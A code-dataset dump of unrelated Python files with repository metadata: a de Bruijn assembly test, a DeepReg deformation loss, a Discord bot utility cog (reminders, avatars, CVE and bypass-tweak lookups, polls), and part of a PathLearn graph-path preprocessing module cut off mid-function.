| 33.626437 | 114 | 0.635105 | 729 | 5,851 | 4.876543 | 0.256516 | 0.024754 | 0.024754 | 0.022504 | 0.081575 | 0.050914 | 0.024754 | 0.024754 | 0 | 0 | 0 | 0.007184 | 0.286276 | 5,851 | 173 | 115 | 33.820809 | 0.844109 | 0.184755 | 0 | 0.056604 | 0 | 0 | 0.016354 | 0 | 0 | 0 | 0 | 0.023121 | 0.009434 | 1 | 0.075472 | false | 0 | 0.122642 | 0 | 0.264151 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a4b236a4945b4b773f1daf37ffb005ccfb83b552 | 2,538 | py | Python | tests/test_eulerian.py | guojingyu/DeNovoAssembly | cd1f3e58c42f97197e73aed085ede07a924ebbdb | [
"MIT"
] | 4 | 2018-09-03T03:09:21.000Z | 2022-03-15T12:57:07.000Z | tests/test_eulerian.py | guojingyu/DeNovoAssembly | cd1f3e58c42f97197e73aed085ede07a924ebbdb | [
"MIT"
] | null | null | null | tests/test_eulerian.py | guojingyu/DeNovoAssembly | cd1f3e58c42f97197e73aed085ede07a924ebbdb | [
"MIT"
] | 3 | 2017-04-24T07:29:23.000Z | 2020-08-13T07:13:06.000Z | #!/usr/bin/env python
"""
Test eulerian functions including the random walk
Author : Jingyu Guo
"""
import unittest
from de_novo_assembly.de_bruijn_graph import DeBruijnGraph
from Bio.SeqRecord import SeqRecord
from de_novo_assembly.eulerian import has_euler_path, has_euler_circuit, \
make_contig_from_path, eulerian_random_walk
class EulerianTests(unittest.TestCase):
def setUp(self):
self.sequence_1 = "ATTAGACCTG"
self.sequence_2 = "ATTTAGACCCTG"
self.sequence_3 = "AGACCCTGAGTCG"
self.test_seq_1 = {'seq_1': SeqRecord(self.sequence_1)}
self.test_seq_2 = {'seq_2': SeqRecord(self.sequence_2),
'seq_3': SeqRecord(self.sequence_3)}
self.dbg_1 = DeBruijnGraph(self.test_seq_1,k=4)
# now link the dbg_1 to make a Eulerian circle
self.dbg_1.G.add_edge("CTG", "ATT")
self.dbg_2 = DeBruijnGraph(self.test_seq_2,k=6)
self.reference_eulerian_path_2 = [('ATTT', 'TTTA'), ('TTTA', 'TTAG'),
('TTAG', 'TAGA'), ('TAGA', 'AGAC'),
('AGAC', 'GACC'), ('GACC', 'ACCC'),
('ACCC', 'CCCT'), ('CCCT', 'CCTG'),
('CCTG', 'CTGA'), ('CTGA', 'TGAG'),
('TGAG', 'GAGT'), ('GAGT', 'AGTC'),
('AGTC', 'GTCG')]
def test_has_euler_path_function(self):
assert has_euler_circuit(self.dbg_1.G) == True
flag,_,_ = has_euler_path(self.dbg_1.G)
assert flag == False
def test_has_euler_circuit_function(self):
assert has_euler_circuit(self.dbg_2.G) == False
flag, _, _ = has_euler_path(self.dbg_2.G)
assert flag == True
def test_eulerian_random_walk(self):
print eulerian_random_walk(self.dbg_2)
class PathToSequenceTests(unittest.TestCase):
def setUp(self):
self.path_1 = [('1','2'),('2','3'),('3','4')]
self.seq_1 = '1234'
self.path_2 = [('1','2'),('2','3'),('3','4'),('4','1')]
self.seq_2 = '12341'
self.path_3 = [('1', '2'), ('2', '1')]
self.seq_3 = '121'
self.path_4 = [('1','2'),('2','3'),('3','1')]
self.seq_4 = '1231'
def test_path_to_sequence(self):
assert self.seq_1 == make_contig_from_path(self.path_1)
assert self.seq_2 == make_contig_from_path(self.path_2)
assert self.seq_3 == make_contig_from_path(self.path_3)
| 35.25 | 77 | 0.559102 | 328 | 2,538 | 4.033537 | 0.259146 | 0.048375 | 0.036281 | 0.054422 | 0.21542 | 0.21164 | 0.060469 | 0.060469 | 0 | 0 | 0 | 0.043646 | 0.28684 | 2,538 | 71 | 78 | 35.746479 | 0.687293 | 0.025611 | 0 | 0.042553 | 0 | 0 | 0.083647 | 0 | 0 | 0 | 0 | 0 | 0.148936 | 0 | null | null | 0 | 0.085106 | null | null | 0.021277 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a4be3796f527611e790afc6213becfff4d63182b | 1,936 | py | Python | deepreg/model/loss/deform.py | agrimwood/DeepRegFromMain20200714 | 1a1b82ca1e09ee03b1a04f35e192e3230be1c2eb | [
"Apache-2.0"
] | null | null | null | deepreg/model/loss/deform.py | agrimwood/DeepRegFromMain20200714 | 1a1b82ca1e09ee03b1a04f35e192e3230be1c2eb | [
"Apache-2.0"
] | null | null | null | deepreg/model/loss/deform.py | agrimwood/DeepRegFromMain20200714 | 1a1b82ca1e09ee03b1a04f35e192e3230be1c2eb | [
"Apache-2.0"
] | null | null | null | import tensorflow as tf
def local_displacement_energy(ddf, energy_type, **kwargs):
def gradient_dx(fv):
return (fv[:, 2:, 1:-1, 1:-1] - fv[:, :-2, 1:-1, 1:-1]) / 2
def gradient_dy(fv):
return (fv[:, 1:-1, 2:, 1:-1] - fv[:, 1:-1, :-2, 1:-1]) / 2
def gradient_dz(fv):
return (fv[:, 1:-1, 1:-1, 2:] - fv[:, 1:-1, 1:-1, :-2]) / 2
def gradient_txyz(Txyz, fn):
return tf.stack([fn(Txyz[..., i]) for i in [0, 1, 2]], axis=4)
def compute_gradient_norm(displacement, l1=False):
dTdx = gradient_txyz(displacement, gradient_dx)
dTdy = gradient_txyz(displacement, gradient_dy)
dTdz = gradient_txyz(displacement, gradient_dz)
if l1:
norms = tf.abs(dTdx) + tf.abs(dTdy) + tf.abs(dTdz)
else:
norms = dTdx ** 2 + dTdy ** 2 + dTdz ** 2
return tf.reduce_mean(norms, [1, 2, 3, 4])
def compute_bending_energy(displacement):
dTdx = gradient_txyz(displacement, gradient_dx)
dTdy = gradient_txyz(displacement, gradient_dy)
dTdz = gradient_txyz(displacement, gradient_dz)
dTdxx = gradient_txyz(dTdx, gradient_dx)
dTdyy = gradient_txyz(dTdy, gradient_dy)
dTdzz = gradient_txyz(dTdz, gradient_dz)
dTdxy = gradient_txyz(dTdx, gradient_dy)
dTdyz = gradient_txyz(dTdy, gradient_dz)
dTdxz = gradient_txyz(dTdx, gradient_dz)
return tf.reduce_mean(
dTdxx ** 2
+ dTdyy ** 2
+ dTdzz ** 2
+ 2 * dTdxy ** 2
+ 2 * dTdxz ** 2
+ 2 * dTdyz ** 2,
[1, 2, 3, 4],
)
if energy_type == "bending":
return compute_bending_energy(ddf)
elif energy_type == "gradient-l2":
return compute_gradient_norm(ddf)
elif energy_type == "gradient-l1":
return compute_gradient_norm(ddf, l1=True)
else:
raise ValueError("Unknown regularizer.")
| 35.2 | 70 | 0.571798 | 257 | 1,936 | 4.128405 | 0.217899 | 0.03016 | 0.02262 | 0.180961 | 0.389255 | 0.254477 | 0.214892 | 0.214892 | 0.214892 | 0.214892 | 0 | 0.045058 | 0.289256 | 1,936 | 54 | 71 | 35.851852 | 0.726017 | 0 | 0 | 0.173913 | 0 | 0 | 0.02531 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.152174 | false | 0 | 0.021739 | 0.086957 | 0.369565 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a4c983cf47d6c5bcf243e3a9a793a1b99475e9b4 | 20,235 | py | Python | cogs/commands/misc/misc.py | DiscordGIR/Bloo | e23172950ebb664cc96d91222b35a90f7d9802c0 | [
"MIT"
] | 34 | 2021-10-30T16:48:28.000Z | 2022-03-25T03:22:12.000Z | cogs/commands/misc/misc.py | DiscordGIR/Bloo | e23172950ebb664cc96d91222b35a90f7d9802c0 | [
"MIT"
] | 9 | 2021-11-19T04:25:29.000Z | 2022-03-09T22:35:46.000Z | cogs/commands/misc/misc.py | DiscordGIR/Bloo | e23172950ebb664cc96d91222b35a90f7d9802c0 | [
"MIT"
] | 20 | 2021-11-05T21:14:59.000Z | 2022-03-30T21:15:40.000Z | import base64
import datetime
import io
import json
import traceback
import aiohttp
import discord
import pytimeparse
from data.services.guild_service import guild_service
from discord.commands import Option, slash_command, message_command, user_command
from discord.ext import commands
from discord.utils import format_dt
from PIL import Image
from utils.autocompleters import (bypass_autocomplete, get_ios_cfw,
rule_autocomplete)
from utils.config import cfg
from utils.context import BlooContext
from utils.logger import logger
from utils.menu import BypassMenu
from utils.permissions.checks import (PermissionsFailure, mod_and_up,
whisper, whisper_in_general)
from utils.permissions.permissions import permissions
from utils.permissions.slash_perms import slash_perms
from yarl import URL
class PFPView(discord.ui.View):
def __init__(self, ctx: BlooContext):
super().__init__(timeout=30)
self.ctx = ctx
async def on_timeout(self):
for child in self.children:
child.disabled = True
await self.ctx.respond_or_edit(view=self)
class PFPButton(discord.ui.Button):
def __init__(self, ctx: BlooContext, member: discord.Member):
super().__init__(label="Show other avatar", style=discord.ButtonStyle.primary)
self.ctx = ctx
self.member = member
self.other = False
async def callback(self, interaction: discord.Interaction):
if interaction.user != self.ctx.author:
return
if not self.other:
avatar = self.member.guild_avatar
self.other = not self.other
else:
avatar = self.member.avatar or self.member.default_avatar
self.other = not self.other
embed = interaction.message.embeds[0]
embed.set_image(url=avatar.replace(size=4096))
animated = ["gif", "png", "jpeg", "webp"]
not_animated = ["png", "jpeg", "webp"]
def fmt(format_):
return f"[{format_}]({avatar.replace(format=format_, size=4096)})"
if avatar.is_animated():
embed.description = f"View As\n {' '.join([fmt(format_) for format_ in animated])}"
else:
embed.description = f"View As\n {' '.join([fmt(format_) for format_ in not_animated])}"
await interaction.response.edit_message(embed=embed)
class BypassDropdown(discord.ui.Select):
def __init__(self, ctx, apps):
self.ctx = ctx
self.apps = {app.get("bundleId"): app for app in apps}
options = [
discord.SelectOption(label=app.get("name"), value=app.get("bundleId"), description="Bypasses found" if app.get("bypasses") else "No bypasses found", emoji='<:appstore:392027597648822281>') for app in apps
]
super().__init__(placeholder='Pick an app...',
min_values=1, max_values=1, options=options)
async def callback(self, interaction):
if interaction.user != self.ctx.author:
return
self.view.stop()
app = self.apps.get(self.values[0])
self.ctx.app = app
if not app.get("bypasses"):
await self.ctx.send_error("No bypasses found for this app!")
return
menu = BypassMenu(self.ctx, app.get("bypasses"), per_page=1,
page_formatter=format_bypass_page, whisper=self.ctx.whisper)
await menu.start()
async def on_timeout(self):
self.disabled = True
self.placeholder = "Timed out"
await self.ctx.edit(view=self._view)
def format_bypass_page(ctx, entries, current_page, all_pages):
ctx.current_bypass = entries[0]
embed = discord.Embed(title=ctx.app.get(
"name"), color=discord.Color.blue())
embed.set_thumbnail(url=ctx.app.get("icon"))
embed.description = f"You can use **{ctx.current_bypass.get('name')}**!"
if ctx.current_bypass.get("notes") is not None:
embed.add_field(name="Note", value=ctx.current_bypass.get('notes'))
embed.color = discord.Color.orange()
if ctx.current_bypass.get("version") is not None:
embed.add_field(name="Supported versions",
value=f"This bypass works on versions {ctx.current_bypass.get('version')} of the app")
embed.set_footer(
text=f"Powered by ios.cfw.guide • Bypass {current_page} of {len(all_pages)}")
return embed
class Misc(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.spam_cooldown = commands.CooldownMapping.from_cooldown(
3, 15.0, commands.BucketType.channel)
try:
with open('emojis.json') as f:
self.emojis = json.loads(f.read())
except:
raise Exception(
"Could not find emojis.json. Make sure to run scrape_emojis.py")
@whisper()
@slash_command(guild_ids=[cfg.guild_id], description="Send yourself a reminder after a given time gap")
async def remindme(self, ctx: BlooContext, reminder: Option(str, description="What do you want to be reminded?"), duration: Option(str, description="When do we remind you? (i.e 1m, 1h, 1d)")):
"""Sends you a reminder after a given time gap
Example usage
-------------
/remindme 1h bake the cake
Parameters
----------
dur : str
"After when to send the reminder"
reminder : str
"What to remind you of"
"""
now = datetime.datetime.now()
delta = pytimeparse.parse(duration)
if delta is None:
raise commands.BadArgument(
"Please give me a valid time to remind you! (i.e 1h, 30m)")
time = now + datetime.timedelta(seconds=delta)
if time < now:
raise commands.BadArgument("Time has to be in the future >:(")
reminder = discord.utils.escape_markdown(reminder)
ctx.tasks.schedule_reminder(ctx.author.id, reminder, time)
# natural_time = humanize.naturaldelta(
# delta, minimum_unit='seconds')
embed = discord.Embed(title="Reminder set", color=discord.Color.random(
), description=f"We'll remind you {discord.utils.format_dt(time, style='R')}")
await ctx.respond(embed=embed, ephemeral=ctx.whisper, delete_after=5)
@slash_command(guild_ids=[cfg.guild_id], description="Post large version of a given emoji")
async def jumbo(self, ctx: BlooContext, emoji: str):
"""Posts large version of a given emoji
Example usage
-------------
/jumbo <emote>
Parameters
----------
emoji : str
"Emoji to enlarge"
"""
# non-mod users will be ratelimited
bot_chan = guild_service.get_guild().channel_botspam
if not permissions.has(ctx.guild, ctx.author, 5) and ctx.channel.id != bot_chan:
bucket = self.spam_cooldown.get_bucket(ctx.interaction)
if bucket.update_rate_limit():
raise commands.BadArgument("This command is on cooldown.")
# is this a regular Unicode emoji?
try:
em = await commands.PartialEmojiConverter().convert(ctx, emoji)
except commands.PartialEmojiConversionFailure:
em = emoji
if isinstance(em, str):
async with ctx.typing():
emoji_url_file = self.emojis.get(em)
if emoji_url_file is None:
raise commands.BadArgument(
"Couldn't find a suitable emoji.")
im = Image.open(io.BytesIO(base64.b64decode(emoji_url_file)))
image_conatiner = io.BytesIO()
im.save(image_conatiner, 'png')
image_conatiner.seek(0)
_file = discord.File(image_conatiner, filename='image.png')
await ctx.respond(file=_file)
else:
await ctx.respond(em.url)
@whisper()
@slash_command(guild_ids=[cfg.guild_id], description="Get avatar of another user or yourself.")
async def avatar(self, ctx: BlooContext, member: Option(discord.Member, description="User to get avatar of", required=False)) -> None:
"""Posts large version of a given emoji
Example usage
-------------
/avatar member:<member>
Parameters
----------
member : discord.Member, optional
"Member to get avatar of"
"""
if member is None:
member = ctx.author
await self.handle_avatar(ctx, member)
@whisper()
@user_command(guild_ids=[cfg.guild_id], name="View avatar")
async def avatar_rc(self, ctx: BlooContext, member: discord.Member):
await self.handle_avatar(ctx, member)
@whisper()
@message_command(guild_ids=[cfg.guild_id], name="View avatar")
async def avatar_msg(self, ctx: BlooContext, message: discord.Message):
await self.handle_avatar(ctx, message.author)
async def handle_avatar(self, ctx, member: discord.Member):
embed = discord.Embed(title=f"{member}'s avatar")
animated = ["gif", "png", "jpeg", "webp"]
not_animated = ["png", "jpeg", "webp"]
avatar = member.avatar or member.default_avatar
def fmt(format_):
return f"[{format_}]({avatar.replace(format=format_, size=4096)})"
if member.display_avatar.is_animated():
embed.description = f"View As\n {' '.join([fmt(format_) for format_ in animated])}"
else:
embed.description = f"View As\n {' '.join([fmt(format_) for format_ in not_animated])}"
embed.set_image(url=avatar.replace(size=4096))
embed.color = discord.Color.random()
view = PFPView(ctx)
if member.guild_avatar is not None:
view.add_item(PFPButton(ctx, member))
view.message = await ctx.respond(embed=embed, ephemeral=ctx.whisper, view=view)
@whisper_in_general()
@slash_command(guild_ids=[cfg.guild_id], description="View information about a CVE")
async def cve(self, ctx: BlooContext, id: str):
"""View information about a CVE
Example usage
-------------
/cve <id>
Parameters
----------
id : str
"ID of CVE to lookup"
"""
try:
async with aiohttp.ClientSession() as client:
async with client.get(URL(f'https://cve.circl.lu/api/cve/{id}', encoded=True)) as resp:
response = json.loads(await resp.text())
embed = discord.Embed(title=response.get(
'id'), color=discord.Color.random())
embed.description = response.get('summary')
embed.add_field(name="Published", value=response.get(
'Published'), inline=True)
embed.add_field(name="Last Modified",
value=response.get('Modified'), inline=True)
embed.add_field(name="Complexity", value=response.get(
'access').get('complexity').title(), inline=False)
embed.set_footer(text="Powered by https://cve.circl.lu")
await ctx.respond(embed=embed, ephemeral=ctx.whisper)
except Exception:
raise commands.BadArgument("Could not find CVE.")
@whisper_in_general()
@slash_command(guild_ids=[cfg.guild_id], description="Find out how to bypass jailbreak detection for an app")
async def bypass(self, ctx: BlooContext, app: Option(str, description="Name of the app", autocomplete=bypass_autocomplete)):
await ctx.defer(ephemeral=ctx.whisper)
data = await get_ios_cfw()
bypasses = data.get('bypass')
matching_apps = [body for _, body in bypasses.items() if app.lower() in body.get("name").lower()]
if not matching_apps:
raise commands.BadArgument(
"The API does not recognize that app or there are no bypasses available.")
# matching_app = bypasses[matching_apps[0]]
# print(matching_app)
if len(matching_apps) > 1:
view = discord.ui.View(timeout=30)
apps = matching_apps[:25]
apps.sort(key=lambda x: x.get("name"))
menu = BypassDropdown(ctx, apps)
view.add_item(menu)
view.on_timeout = menu.on_timeout
embed = discord.Embed(
description="Which app would you like to view bypasses for?", color=discord.Color.blurple())
await ctx.respond(embed=embed, view=view, ephemeral=ctx.whisper)
else:
ctx.app = matching_apps[0]
bypasses = ctx.app.get("bypasses")
if not bypasses or bypasses is None or bypasses == [None]:
raise commands.BadArgument(
f"{ctx.app.get('name')} has no bypasses.")
menu = BypassMenu(ctx, ctx.app.get(
"bypasses"), per_page=1, page_formatter=format_bypass_page, whisper=ctx.whisper)
await menu.start()
@slash_command(guild_ids=[cfg.guild_id], description="Post the embed for one of the rules")
async def rule(self, ctx: BlooContext, title: Option(str, autocomplete=rule_autocomplete), user_to_mention: Option(discord.Member, description="User to mention in the response", required=False)):
if title not in self.bot.rule_cache.cache:
potential_rules = [r for r in self.bot.rule_cache.cache if title.lower() == r.lower(
) or title.strip() == f"{r} - {self.bot.rule_cache.cache[r].description}"[:100].strip()]
if not potential_rules:
raise commands.BadArgument(
"Rule not found! Title must match one of the embeds exactly, use autocomplete to help!")
title = potential_rules[0]
embed = self.bot.rule_cache.cache[title]
if user_to_mention is not None:
title = f"Hey {user_to_mention.mention}, have a look at this!"
else:
title = None
await ctx.respond_or_edit(content=title, embed=embed)
@slash_command(guild_ids=[cfg.guild_id], description="Get the topic for a channel")
async def topic(self, ctx: BlooContext, channel: Option(discord.TextChannel, description="Channel to get the topic from", required=False), user_to_mention: Option(discord.Member, description="User to mention in the response", required=False)):
"""get the channel's topic"""
channel = channel or ctx.channel
if channel.topic is None:
raise commands.BadArgument(f"{channel.mention} has no topic!")
if user_to_mention is not None:
title = f"Hey {user_to_mention.mention}, have a look at this!"
else:
title = None
embed = discord.Embed(title=f"#{channel.name}'s topic",
description=channel.topic, color=discord.Color.blue())
await ctx.respond_or_edit(content=title, embed=embed)
@mod_and_up()
@slash_command(guild_ids=[cfg.guild_id], description="Start a poll", permissions=slash_perms.mod_and_up())
async def poll(self, ctx: BlooContext, question: str, channel: Option(discord.TextChannel, required=False, description="Where to post the message") = None):
if channel is None:
channel = ctx.channel
embed=discord.Embed(description=question, color=discord.Color.random())
embed.timestamp = datetime.datetime.now()
embed.set_footer(text=f"Poll started by {ctx.author}")
message = await channel.send(embed=embed)
emojis = ['⬆️', '⬇️']
for emoji in emojis:
await message.add_reaction(emoji)
ctx.whisper = True
await ctx.send_success("Done!")
@slash_command(guild_ids=[cfg.guild_id], description="View the status of various Discord features")
@commands.guild_only()
async def dstatus(self, ctx):
async with aiohttp.ClientSession() as session:
async with session.get("https://discordstatus.com/api/v2/components.json") as resp:
if resp.status == 200:
components = await resp.json()
async with aiohttp.ClientSession() as session:
async with session.get("https://discordstatus.com/api/v2/incidents.json") as resp:
if resp.status == 200:
incidents = await resp.json()
api_status = components.get('components')[0].get('status').title() # API
mp_status = components.get('components')[4].get('status').title() # Media Proxy
pn_status = components.get('components')[6].get('status').title() # Push Notifications
s_status = components.get('components')[8].get('status').title() # Search
v_status = components.get('components')[11].get('status').title() # Voice
cf_status = components.get('components')[2].get('status').title() # Cloudflare
title = "All Systems Operational" if api_status == "Operational" and mp_status == "Operational" and pn_status == "Operational" and s_status == "Operational" and v_status == "Operational" and cf_status == "Operational" else "Known Incident"
color = discord.Color.green() if title == "All Systems Operational" else discord.Color.orange()
last_incident = incidents.get('incidents')[0].get('name')
last_status = incidents.get('incidents')[0].get('status').title()
last_created = datetime.datetime.strptime(incidents.get('incidents')[0].get('created_at'), "%Y-%m-%dT%H:%M:%S.%f%z")
last_update = datetime.datetime.strptime(incidents.get('incidents')[0].get('updated_at'), "%Y-%m-%dT%H:%M:%S.%f%z")
last_impact = incidents.get('incidents')[0].get('impact')
online = '<:status_online:942288772551278623>'
offline = '<:status_dnd:942288811818352652>'
incident_icons = {'none': '<:status_offline:942288832051679302>',
'maintenance': '<:status_total:942290485916073995>',
'minor': '<:status_idle:942288787000680499>',
'major': '<:status_dnd:942288811818352652>',
'critical': '<:status_dnd:942288811818352652>'}
embed = discord.Embed(title=title, description=f"""
{online if api_status == 'Operational' else offline} **API:** {api_status}
{online if mp_status == 'Operational' else offline} **Media Proxy:** {mp_status}
{online if pn_status == 'Operational' else offline} **Push Notifications:** {pn_status}
{online if s_status == 'Operational' else offline} **Search:** {s_status}
{online if v_status == 'Operational' else offline} **Voice:** {v_status}
{online if cf_status == 'Operational' else offline} **Cloudflare:** {cf_status}
__**Last outage information**__
**Incident:** {incident_icons.get(last_impact)} {last_incident}
**Status:** {online if last_status == 'Resolved' else offline} {last_status}
**Identified at:** {format_dt(last_created, style='F')}
**{'Resolved at' if last_status == 'Resolved' else 'Last updated'}:** {format_dt(last_update, style='F')}
""", color=color)
embed.set_footer(text="Powered by discordstatus.com")
await ctx.respond(embed=embed)
@topic.error
@rule.error
@poll.error
@bypass.error
@cve.error
@dstatus.error
@remindme.error
@jumbo.error
@avatar.error
async def info_error(self, ctx: BlooContext, error):
if isinstance(error, discord.ApplicationCommandInvokeError):
error = error.original
if (isinstance(error, commands.MissingRequiredArgument)
or isinstance(error, PermissionsFailure)
or isinstance(error, commands.BadArgument)
or isinstance(error, commands.BadUnionArgument)
or isinstance(error, commands.MissingPermissions)
or isinstance(error, commands.BotMissingPermissions)
or isinstance(error, commands.MaxConcurrencyReached)
or isinstance(error, commands.NoPrivateMessage)):
await ctx.send_error(error)
else:
await ctx.send_error("A fatal error occured. Tell <@109705860275539968> about this.")
logger.error(traceback.format_exc())
def setup(bot):
bot.add_cog(Misc(bot))
| 42.510504 | 247 | 0.629009 | 2,473 | 20,235 | 5.031945 | 0.182774 | 0.015188 | 0.018804 | 0.015911 | 0.293877 | 0.22549 | 0.197927 | 0.179444 | 0.144166 | 0.107843 | 0 | 0.015663 | 0.249073 | 20,235 | 475 | 248 | 42.6 | 0.802962 | 0.012849 | 0 | 0.186589 | 0 | 0.002915 | 0.210518 | 0.037519 | 0 | 0 | 0 | 0 | 0 | 1 | 0.023324 | false | 0.084548 | 0.06414 | 0.005831 | 0.116618 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
a4c9be815d012e1c1acce15131efcf8844daf07b | 14,699 | py | Python | src/preprocessing.py | smartdatalake/pathlearn | 9bf76e6ffc4c16800f53ed4e4985e6f6f3674756 | [
"Apache-2.0"
] | null | null | null | src/preprocessing.py | smartdatalake/pathlearn | 9bf76e6ffc4c16800f53ed4e4985e6f6f3674756 | [
"Apache-2.0"
] | null | null | null | src/preprocessing.py | smartdatalake/pathlearn | 9bf76e6ffc4c16800f53ed4e4985e6f6f3674756 | [
"Apache-2.0"
] | null | null | null | """This module provides various functions used to read/write and generate the data structures used for Path Learn"""
import networkx as nx
import random as rnd
import numpy as np
import pandas as pd
import os
def find_single_paths(G, node, lim, paths_lim=float('inf')):
"""
:param G: A NetworkX graph.
:param node: A node v.
:param lim: Maximum number of steps.
:param paths_lim: Maximum number of paths.
:return: All paths up to lim steps, starting from node v.
"""
paths = []
to_extend = [[node]]
while to_extend and len(paths) < paths_lim:
cur_path = to_extend.pop(0)
paths.append(cur_path)
if len(cur_path) < 2 * lim + 1:
for neigh in G[cur_path[-1]]:
if neigh not in cur_path:
for rel_id in G[cur_path[-1]][neigh]:
ext_path = list(cur_path)
ext_path.append(rel_id)
ext_path.append(neigh)
to_extend.append(ext_path)
return paths[1:]
def has_circles(path):
"""
:param path: A sequence of node/edges
:return: True if the path contains circles
"""
nodes = set()
for i, n in enumerate(path):
if i % 2 == 0:
if n in nodes:
return True
else:
nodes.add(n)
return False
def find_paths_between(G, start, end, length):
"""
Finds all paths up to a given length between two nodes.
:param G: NetworkX graph.
:param start: Start node.
:param end: End node.
:param length: Maximum path length.
:return: A set with all paths up to *length* fron *start* to *ends*.
"""
if length % 2 == 0:
length1 = length / 2
length2 = length / 2
else:
length1 = int(length / 2) + 1
length2 = int(length / 2)
paths1 = find_single_paths(G, start, length1)
paths2 = find_single_paths(G, end, length2)
path2_ind = {}
for path2 in paths2:
if path2[-1] not in path2_ind:
path2_ind[path2[-1]] = []
path2_ind[path2[-1]].append(path2)
full_paths = set()
if end in G[start]:
for edge_id in G[start][end]:
full_paths.add((start, edge_id, end))
for path1 in paths1:
try:
ext_paths = path2_ind[path1[-1]]
except:
ext_paths = []
for ext_path in ext_paths:
full_path = tuple(path1 + list(reversed(ext_path[0:-1])))
if not has_circles(full_path):
full_paths.add(full_path)
return full_paths
def find_pair_paths(G, all_pairs, length, rev_rel=None):
"""
Finds paths beetween a collection of node pairs.
:param G: NetworkX graph.
:param all_pairs: A collection of node pairs.
:param length: Maximum path length
:param rev_rel: Type of reverse relation, for directed graphs.
:return: A two level dictionary with the paths for each pair.
"""
T = {}
if not rev_rel:
rev_rel = all_pairs[0][1]
for count, pair in enumerate(all_pairs):
print('finding paths: ' + str(count) + '/' + str(len(all_pairs)))
start = pair[0]
rel = pair[1]
end = pair[2]
rev_pair = (end, rev_rel, start)
if start not in T:
T[start] = {}
if end not in T[start]:
T[start][end] = set()
# paths = nx.all_simple_paths(G,start,end,length)
paths = find_paths_between(G, start, end, length)
for path in paths:
path_ext = []
dirty = False
for i in range(1, len(path) - 1):
if i % 2 == 0:
path_ext.append(path[i])
else:
step_rel = G[path[i - 1]][path[i + 1]][path[i]]['type']
step_pair = (path[i - 1], step_rel, path[i + 1])
if (step_pair[0] != pair[0] or step_pair[1] != pair[1] or step_pair[2] != pair[2]) and (
step_pair[0] != rev_pair[0] or step_pair[1] != rev_pair[1] or step_pair[2] !=
rev_pair[2]):
path_ext.append(step_rel)
else:
dirty = True
break
if not dirty:
T[start][end].add(tuple(path_ext))
print('returning')
return T
def find_single_pair_paths(G, pair, length, rev_rel=None):
"""
Finds all paths for a single pair of nodes.
:param G: NetworkX graph.
:param pair: The node pair.
:param length: Maximum length.
:param rev_rel: Reverse relation type, for directed graphs.
:return: All paths up to *length( between the pair.
"""
if not rev_rel:
rev_rel = pair[1]
start = pair[0]
rel = pair[1]
end = pair[2]
rev_pair = [end, rev_rel, start]
paths = find_paths_between(G, start, end, length)
paths_out = set()
for path in paths:
path_ext = []
dirty = False
for i in range(1, len(path) - 1):
if i % 2 == 0:
path_ext.append(path[i])
else:
step_rel = G[path[i - 1]][path[i + 1]][path[i]]['elabel']
step_pair = [path[i - 1], step_rel, path[i + 1]]
if step_pair != pair and step_pair != rev_pair:
path_ext.append(step_rel)
else:
dirty = True
break
if not dirty:
paths_out.add(tuple(path_ext))
return paths_out
def add_paths(G, pair_set, steps, rev_rel, T):
"""
Adds new paths to path dictionary T.
:param G: Networkx graph.
:param pair_set: A collection of pairs.
:param steps: Maximum path length.
:param rev_rel: Reverse relation type, for directed graphs.
:param T: A path dictionary T.
:return: A path dictionary T that includes paths for pairs in pair_set.
"""
T_new = find_pair_paths(G, pair_set, steps, rev_rel)
for u in T_new:
if u not in T:
T[u] = {}
for v in T_new[u]:
if v not in T[u]:
T[u][v] = set()
for path in T_new[u][v]:
T[u][v].add(path)
return T
def add_Ts(T0,T1):
"""
Merges two path dictionaries.
:param T0: A path dictionary.
:param T1: A path dictionary.
:return: A merged path dictionary.
"""
for u in T1:
if u not in T0:
T0[u] = {}
for v in T1[u]:
if v not in T0[u]:
T0[u][v] = set()
for path in T1[u][v]:
T0[u][v].add(path)
return T0
def graph_to_files(G, path):
"""
Saves graph to file.
:param G: NetworkX graph.
:param path: Folder path.
"""
nodes = list(G.nodes)
node_types = [G.nodes[n]['type'] for n in nodes]
for type in set(node_types):
print('writing type '+str(type))
node_feats = []
nodes_of_type = [n for n in G if G.nodes[n]['type']==type]
for n in nodes_of_type:
node_feats.append([n] + (G.nodes[n]['features'] if 'features' in G.nodes[n] else [0]))
column_names = ['id'] + ['feat_'+str(i) for i in range(len(node_feats[0])-1)]
pd.DataFrame(node_feats,columns=column_names).fillna(0).to_csv(path+'/nodes/'+str(type)+'.csv',index=False)
print('writing relations')
edges = list(G.edges)
edge_feats = []
for e in edges:
edge_feats.append([e[0], e[1], G[e[0]][e[1]][int(e[2])]['type']] + (G[e[0]][e[1]][int(e[2])]['features'] if 'features' in G[e[0]][e[1]][int(e[2])] else [0]))
column_names = ['src', 'dst', 'type'] + ['feat_' + str(i) for i in range( max( [len(ef) for ef in edge_feats] ) - 3)]
pd.DataFrame(edge_feats, columns=column_names).fillna(0).to_csv(path+'/relations/relations.csv',index=False)
def graph_from_files(path):
"""
Reads graph from file.
:param path: folder path.
:return: NetworkX graph.
"""
G = nx.MultiDiGraph()
for file in os.listdir(path+'/nodes'):
